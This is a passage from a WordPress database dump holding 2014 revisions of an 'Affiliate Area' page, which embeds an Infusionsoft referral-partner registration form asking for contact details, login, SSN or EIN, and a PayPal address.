100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-input-container" style="width: 400px;"><span class="infusion-option"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" style="margin-right: 3px;" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div class="infusion-submit" style="text-align: center;"><button type="submit" value="Register!">Register!</button></div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-30 09:41:31', '2014-07-30 14:41:31', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1314, 4194, '2014-07-30 09:39:28', '2014-07-30 14:39:28', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style=">\r\n\r\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">// <![CDATA[\r\n\r\n// ]]></script>\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST" name="CYB Referall Partner Registration"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.32.0.59" />\r\n<div id="mainContent" class="simple beta-base beta-font-b" style="height: 100%;">\r\n<table class="background" style="width: 100%; height: 100%;" cellspacing="0" cellpadding="10">\r\n<tbody>\r\n<tr>\r\n<td align="center" valign="top">\r\n<table class="bodyContainer webFormBodyContainer" width="100%" cellspacing="0" cellpadding="20" bgcolor="#FFFFFF">\r\n<tbody>\r\n<tr>\r\n<td class="body" valign="top" bgcolor="#FFFFFF">\r\n<div id="webformErrors" class="text"></div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div style="text-align: center;"><span style="font-size: 14pt;"><strong><span style="color: #000000;">Referral Partner Registration </span></strong></span></div>\r\n<div><span style="color: #000000;"> </span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_LastName">Last Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<div style="height: 15px; line-height: 15px;"></div>\r\n</div>\r\n<div>\r\n<div style="height: 20px;">\r\n<div style="height: 10px; border-bottom: 1px solid #CCCCCC;"></div>\r\n<div style="height: 10px;"></div>\r\n</div>\r\n</div>\r\n<div>\r\n<div style="height: 15px; line-height: 15px;"></div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Company">Company</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Company" class="infusion-field-input-container" name="inf_field_Company" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Phone1">Phone Number *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress1">Street Address 1 *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress1" class="infusion-field-input-container" name="inf_field_StreetAddress1" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress2"> Street Address 2</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress2" class="infusion-field-input-container" name="inf_field_StreetAddress2" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_City"> City *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_State">State *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_PostalCode"> Postal Code *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_PostalCode" class="infusion-field-input-container" name="inf_field_PostalCode" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Country">Country *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<div style="height: 15px; line-height: 15px;"></div>\r\n</div>\r\n<div>\r\n<div style="height: 20px;">\r\n<div style="height: 10px; border-bottom: 1px solid #CCCCCC;"></div>\r\n<div style="height: 10px;"></div>\r\n</div>\r\n</div>\r\n<div>\r\n<div style="height: 15px; line-height: 15px;"></div>\r\n</div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n\r\nChoose a Username of approximately 4 to 8 letters. Enter either your SSN or EIN # below.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Username">Username *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Password">Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_RetypePassword">Confirm Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_SSN">SSN *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_SSN" class="infusion-field-input-container" name="inf_field_SSN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_EIN">EIN #</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_EIN" class="infusion-field-input-container" name="inf_custom_EIN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<div style="height: 15px; line-height: 15px;"></div>\r\n</div>\r\n<div>\r\n<div style="height: 20px;">\r\n<div style="height: 10px; border-bottom: 1px solid #CCCCCC;"></div>\r\n<div style="height: 10px;"></div>\r\n</div>\r\n</div>\r\n<div>\r\n<div style="height: 15px; line-height: 15px;"></div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-input-container" style="width: 400px;"><span class="infusion-option"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" style="margin-right: 3px;" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<div style="height: 20px; line-height: 20px;"></div>\r\n</div>\r\n<div>\r\n<div class="infusion-submit" style="text-align: center;"><button type="submit" value="Register!">Register!</button></div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-30 09:39:28', '2014-07-30 14:39:28', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1316, 4194, '2014-07-30 09:43:58', '2014-07-30 14:43:58', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style=">\r\n\r\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">// <![CDATA[\r\n\r\n// ]]></script>\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST" name="CYB Referall Partner Registration"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.32.0.59" />\r\n<div id="mainContent" class="simple beta-base beta-font-b" style="height: 100%;">\r\n<table class="background" style="width: 100%; height: 100%;" border="0" cellspacing="0" cellpadding="10">\r\n<tbody>\r\n<tr>\r\n<td align="center" valign="top">\r\n<table class="bodyContainer webFormBodyContainer" border="0" width="100%" cellspacing="0" cellpadding="20" bgcolor="#FFFFFF">\r\n<tbody>\r\n<tr>\r\n<td class="body" valign="top" bgcolor="#FFFFFF">\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div><span style="color: #000000;"> </span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;" border="0">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_LastName">Last Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Company">Company</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Company" class="infusion-field-input-container" name="inf_field_Company" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Phone1">Phone Number *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress1">Street Address 1 *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress1" class="infusion-field-input-container" name="inf_field_StreetAddress1" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress2"> Street Address 2</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress2" class="infusion-field-input-container" name="inf_field_StreetAddress2" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_City"> City *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_State">State *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_PostalCode"> Postal Code *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_PostalCode" class="infusion-field-input-container" name="inf_field_PostalCode" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Country">Country *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option 